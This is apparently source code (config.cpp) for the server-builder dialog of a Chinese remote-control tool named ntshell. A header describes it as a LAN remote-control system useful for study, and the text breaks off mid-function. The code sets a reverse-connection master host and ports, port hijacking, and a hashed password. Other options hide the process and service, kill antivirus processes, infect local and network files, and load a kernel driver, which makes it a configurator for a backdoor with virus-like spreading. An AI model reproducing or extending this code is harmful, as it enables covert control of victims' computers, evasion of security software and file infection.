config.cpp

远程控制系统,可以实现局域网内进行远程控制计算机,很方便,并且是学习用的非常好的资料.

// config.cpp: implementation of the CServerConfig class.
//
//////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include "resource.h"
#include "common.h"

#include "ntshell.h"
#include "md5.h"
#include "config.h"

TCHAR MasterAddr[MAX_ADDRESS_LENGTH] = "mnjcc.vicp.net";
TCHAR MasterAddr2[MAX_ADDRESS_LENGTH] = "192.168.0.23";
USHORT MasterPort = 7070;
USHORT ListenPort = 24704;
ULONG ConnSpace = 20000;
UCHAR WaitMode = 1;
BOOLEAN PortHijack = FALSE;
BOOLEAN NeedPwd = FALSE;
TCHAR Password[MAX_PASSWORD_LENGTH];
ULONG ConfigFlags = FLAG_ALLOW_RING0 | FLAG_RECORD_ERROR | FLAG_AUTO_BACKUP_FILE | FLAG_RING0_OPEN_FILE;
UCHAR RunMethod = 0;

UCHAR config[CONFIG_SECTION_SIZE] = {0x12, 0x34, 0x56, 0x78};

HHOOK hHookOldMsgFilter;
CToolTipCtrl *tip;

LRESULT CALLBACK CServerConfig::MsgFilterHook(int code, WPARAM wParam, LPARAM lParam)
{
	if (::IsWindow(*tip))
	{
		tip->RelayEvent((LPMSG)lParam);
	}

	return CallNextHookEx(hHookOldMsgFilter, code, wParam, lParam);
}

LRESULT CServerConfig::OnInitDialog(UINT /*uMsg*/, WPARAM /*wParam*/, LPARAM lParam, BOOL& /*bHandled*/)
{
	// center the dialog on the screen
	CenterWindow();

	m_tip.Create(this->m_hWnd);
	m_tip.AddTool(GetDlgItem(IDC_CHECK3), "可能被某些反毒软件检测到");
	m_tip.AddTool(GetDlgItem(IDC_CHECK4), "可能导致远程操作系统崩溃");
	m_tip.AddTool(GetDlgItem(IDC_CHECK6), "需打开Ring0操作，否则没什么效果");
	m_tip.AddTool(GetDlgItem(IDC_CHECK7), "慎用");
	m_tip.AddTool(GetDlgItem(IDC_CHECK9), "位于%SYSTEMROOT%\\ntshell.log");
	m_tip.AddTool(GetDlgItem(IDC_CHECK10), "可感染使用中的文件");
	m_tip.AddTool(GetDlgItem(IDC_CHECK11), "备份在%SYSTEMROOT%\\system32\\backup目录下");
	m_tip.AddTool(GetDlgItem(IDC_CHECK12), "会被反毒软件阻止，2000/XP可尝试先杀掉反毒软件进程");
	m_tip.SetTipTextColor(RGB(0, 0, 255));
	m_tip.SetDelayTime(TTDT_AUTOPOP, 15000);
	m_tip.Activate(TRUE);
	hHookOldMsgFilter = SetWindowsHookEx(WH_MSGFILTER, MsgFilterHook, NULL, GetCurrentThreadId());
	tip = &m_tip;

	LoadConfig();

	return TRUE;
}

LRESULT CServerConfig::OnDestroy(UINT /*uMsg*/, WPARAM /*wParam*/, LPARAM lParam, BOOL& /*bHandled*/)
{
	UnhookWindowsHookEx(hHookOldMsgFilter);

	return TRUE;
}

LRESULT CServerConfig::OnHelp(UINT /*uMsg*/, WPARAM /*wParam*/, LPARAM lParam, BOOL& /*bHandled*/)
{
	LPHELPINFO lphi = (LPHELPINFO)lParam;

	WinHelp("test", HELP_CONTEXTPOPUP);

	return 0;
}

void CServerConfig::SetConfigSection(int Block)
{
	static int pointer = 0;
	UCHAR *p;
	ULONG l;

	switch (Block)
	{
	case CFG_BEGIN:
		memset(config + 4, 0, sizeof(config) - 4);
		pointer = 5;
		config[4] = Block;
		return;

	case CFG_END:
		config[pointer] = Block;
		return;

	case CFG_MASTER_ADDR:
		p = (UCHAR *)MasterAddr;
		l = strlen(MasterAddr) + 1;
		break;

	case CFG_MASTER_ADDR2:
		p = (UCHAR *)MasterAddr2;
		l = strlen(MasterAddr2) + 1;
		break;

	case CFG_MASTER_PORT:
		p = (UCHAR *)&MasterPort;
		l = sizeof(MasterPort);
		break;

	case CFG_LISTEN_PORT:
		p = (UCHAR *)&ListenPort;
		l = sizeof(ListenPort);
		break;

	case CFG_WAIT_MODE:
		p = (UCHAR *)&WaitMode;
		l = sizeof(WaitMode);
		break;

	case CFG_NEED_PWD:
		p = (UCHAR *)&NeedPwd;
		l = sizeof(NeedPwd);
		break;

	case CFG_PASSWORD:
		p = (UCHAR *)Password;
		l = MAX_PASSWORD_LENGTH;
		break;

	case CFG_GLOBAL_FLAGS:
		p = (UCHAR *)&ConfigFlags;
		l = sizeof(MasterPort);
		break;

	case CFG_CONN_SPACE:
		p = (UCHAR *)&ConnSpace;
		l = sizeof(ConnSpace);
		break;

	case CFG_PORT_HIJACK:
		p = (UCHAR *)&PortHijack;
		l = sizeof(PortHijack);
		break;

	case CFG_RUN_METHOD:
		p = (UCHAR *)&RunMethod;
		l = sizeof(RunMethod);
		break;

	default:
		MessageBox("配置错误，指定块未定义", "", MB_ICONERROR);
		return;
	}

	config[pointer] = Block;
	config[pointer + 1] = (UCHAR)l;
	memcpy(config + pointer + 2, p, l);
	pointer += 1 + 1 + l;
}

LRESULT CServerConfig::OnReload(WORD /*wNotifyCode*/, WORD /*wID*/, HWND /*hWndCtl*/, BOOL& /*bHandled*/)
{
	LoadConfig();

	return 0;
}

LRESULT CServerConfig::OnOK(WORD /*wNotifyCode*/, WORD /*wID*/, HWND /*hWndCtl*/, BOOL& /*bHandled*/)
{
	SetConfigSection(CFG_BEGIN);

	if (IsDlgButtonChecked(IDC_RADIO1) == BST_CHECKED || IsDlgButtonChecked(IDC_RADIO3) == BST_CHECKED)
	{
		PortHijack = IsDlgButtonChecked(IDC_RADIO4) == BST_CHECKED ? FALSE : TRUE;
		SetConfigSection(CFG_PORT_HIJACK);

		ListenPort = GetDlgItemInt(IDC_EDIT5);
		SetConfigSection(CFG_LISTEN_PORT);
	}

	CString msg;

	if (IsDlgButtonChecked(IDC_RADIO2) == BST_CHECKED || IsDlgButtonChecked(IDC_RADIO3) == BST_CHECKED)
	{
		if (::GetWindowTextLength(GetDlgItem(IDC_EDIT1)) >= sizeof(MasterAddr) ||
			::GetWindowTextLength(GetDlgItem(IDC_EDIT2)) >= sizeof(MasterAddr2))
		{
			msg.Format("反向连接地址长度不能超过 %d", sizeof(MasterAddr) - 1);
			MessageBox(msg, "错误", MB_ICONERROR);
			return -1;
		}

		GetDlgItemText(IDC_EDIT1, MasterAddr, sizeof(MasterAddr));
		SetConfigSection(CFG_MASTER_ADDR);

		GetDlgItemText(IDC_EDIT2, MasterAddr2, sizeof(MasterAddr2));
		SetConfigSection(CFG_MASTER_ADDR2);

		MasterPort = GetDlgItemInt(IDC_EDIT3);
		SetConfigSection(CFG_MASTER_PORT);

		ConnSpace = GetDlgItemInt(IDC_EDIT4);
		SetConfigSection(CFG_CONN_SPACE);
	}

	if (IsDlgButtonChecked(IDC_RADIO1) == BST_CHECKED)
		WaitMode = 0;
	else if (IsDlgButtonChecked(IDC_RADIO2) == BST_CHECKED)
		WaitMode = 1;
	else if (IsDlgButtonChecked(IDC_RADIO3) == BST_CHECKED)
		WaitMode = 2;

	SetConfigSection(CFG_WAIT_MODE);

	NeedPwd = FALSE;

	if (IsDlgButtonChecked(IDC_CHECK1) == BST_CHECKED)
	{
		TCHAR pwd1[32], pwd2[32];
		ULONG len1, len2;

		len1 = ::GetWindowTextLength(GetDlgItem(IDC_EDIT6));
		len2 = ::GetWindowTextLength(GetDlgItem(IDC_EDIT7));

		if ((len1 > sizeof(pwd1) - 1 || len1 <= 0) || (len2 > sizeof(pwd2) - 1 || len2 <= 0))
		{
			msg.Format("密码长度必需是 1-%d 个字符", sizeof(pwd1) - 1);
			MessageBox(msg, "错误", MB_ICONERROR);
			return -1;
		}

		GetDlgItemText(IDC_EDIT6, pwd1, sizeof(pwd1));
		GetDlgItemText(IDC_EDIT7, pwd2, sizeof(pwd2));

		if (strcmp(pwd1, pwd2) != 0)
		{
			MessageBox("两次输入的密码不一致，请重新输入", "错误", MB_ICONERROR);
			SetDlgItemText(IDC_EDIT6, "");
			SetDlgItemText(IDC_EDIT7, "");
			return -1;
		}

		NeedPwd = TRUE;
		SetConfigSection(CFG_NEED_PWD);

		memset(Password, 0, sizeof(Password));

		MD5_CTX context;
		MD5Init(&context);
		MD5Update(&context, (BYTE *)pwd1, strlen(pwd1));
		MD5Final((BYTE *)Password, &context);

		Password[0] = 86;
		Password[4] = 29;
		Password[8] = 91;

		SetConfigSection(CFG_PASSWORD);
	}

	if (IsDlgButtonChecked(IDC_RADIO6) == BST_CHECKED)
	{
		RunMethod = 0;
	}
	else
	{
		if (IsDlgButtonChecked(IDC_CHECK2) == BST_CHECKED)
			RunMethod = 2;
		else
			RunMethod = 1;
	}

	SetConfigSection(CFG_RUN_METHOD);

	ConfigFlags = 0;

	if (IsDlgButtonChecked(IDC_CHECK3) == BST_CHECKED)
		ConfigFlags |= FLAG_ALLOW_HIDE_PROCESS;

	if (IsDlgButtonChecked(IDC_CHECK4) == BST_CHECKED)
		ConfigFlags |= FLAG_ALLOW_RING0;

	if (IsDlgButtonChecked(IDC_CHECK5) == BST_CHECKED)
		ConfigFlags |= FLAG_RUN_SERVICE_ALWAYS;

	if (IsDlgButtonChecked(IDC_CHECK6) == BST_CHECKED)
		ConfigFlags |= FLAG_AUTO_KILL_AVSOFT;

	if (IsDlgButtonChecked(IDC_CHECK7) == BST_CHECKED)
		ConfigFlags |= FLAG_AUTO_INFECT_FILE;

	if (IsDlgButtonChecked(IDC_CHECK8) == BST_CHECKED)
		ConfigFlags |= FLAG_AUTO_INFECT_LAN_FILE;

	if (IsDlgButtonChecked(IDC_CHECK9) == BST_CHECKED)
		ConfigFlags |= FLAG_RECORD_ERROR;

	if (IsDlgButtonChecked(IDC_CHECK10) == BST_CHECKED)
		ConfigFlags |= FLAG_RING0_OPEN_FILE;

	if (IsDlgButtonChecked(IDC_CHECK11) == BST_CHECKED)
		ConfigFlags |= FLAG_AUTO_BACKUP_FILE;

	if (IsDlgButtonChecked(IDC_CHECK12) == BST_CHECKED)
		ConfigFlags |= FLAG_ALLOW_LOAD_DRIVER;

	if (IsDlgButtonChecked(IDC_CHECK13) == BST_CHECKED)
		ConfigFlags |= FLAG_ALLOW_HIDE_SERVICE;

	SetConfigSection(CFG_GLOBAL_FLAGS);
	SetConfigSection(CFG_END);
	SaveConfig();

	return 0;
}

LRESULT CServerConfig::OnMake(WORD wNotifyCode, WORD wID, HWND hWndCtl, BOOL& bHandled)
{
	if (OnOK(wNotifyCode, wID, hWndCtl, bHandled) != 0)
		return 0;

	HMODULE hModule = GetModuleHandle(NULL);